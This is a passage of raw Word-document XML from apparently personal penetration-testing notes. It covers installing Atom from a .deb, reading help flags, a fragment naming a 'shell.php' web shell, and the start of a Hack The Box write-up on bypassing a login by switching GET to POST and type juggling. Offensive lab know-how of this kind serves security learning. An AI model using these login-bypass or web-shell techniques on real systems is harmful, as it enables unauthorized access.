        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003788">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003789">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name of the file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You would paste this and it would run as one line</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378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8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p1npxuqdlkh4" w:id="503"/>
      <w:bookmarkEnd w:id="503"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install an application as a .deb file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003790">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003791">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I wanted to install atom, but it wasn't working so I decided to install it as a .deb file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003792">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the atom-amd64.deb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003793">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/Downloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003794">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ./atom-amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it's done!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003796">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379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98">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9gsaeib8hvj0" w:id="504"/>
      <w:bookmarkEnd w:id="504"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to read the "help" output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to read help menu (-h or --help)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="484" name="image483.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image483.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117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379D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, for this perl application, I see a bunch of "+" at the end of each flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A flag ending with + means this option requires an argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A flag without + means it’s just a toggle (true/false).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for example, for authentication, you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-auth michael:password123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="296" name="image303.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image303.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117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37A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5235750" cy="4262438"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="412" name="image415.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image415.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1176"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5235750" cy="4262438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4681538" cy="3844015"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="525" name="image513.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image513.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1177"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681538" cy="3844015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4776788" cy="3960560"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="244" name="image233.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image233.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1178"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4776788" cy="3960560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4757738" cy="4284117"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="306" name="image299.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image299.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1179"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4757738" cy="4284117"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5110163" cy="3365828"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="429" name="image414.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image414.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1180"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5110163" cy="3365828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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7AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iersxlr1ke5b" w:id="505"/>
      <w:bookmarkEnd w:id="505"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Attack Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ejnqrc1pz576" w:id="506"/>
      <w:bookmarkEnd w:id="506"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET to POST and type juggling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Random HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We were presented with a simple login page, and there seemed to be no working attack vectors. But, we noticed that every time we were logging in (as seen from Burpsuite or the network tab in the Inspection tool), it was sending a GET request to /api/login instead of refreshing the page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="456" name="image439.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image439.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1181"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2133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B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we tried changing the GET request to a POST request (by right clicking and selecting "Change request method", but it didn't allow for that. However, the good thing about this is that we moved the password argument and value to the request body (bottom of the http request). </w:t>
      </w:r>
    </w:p>
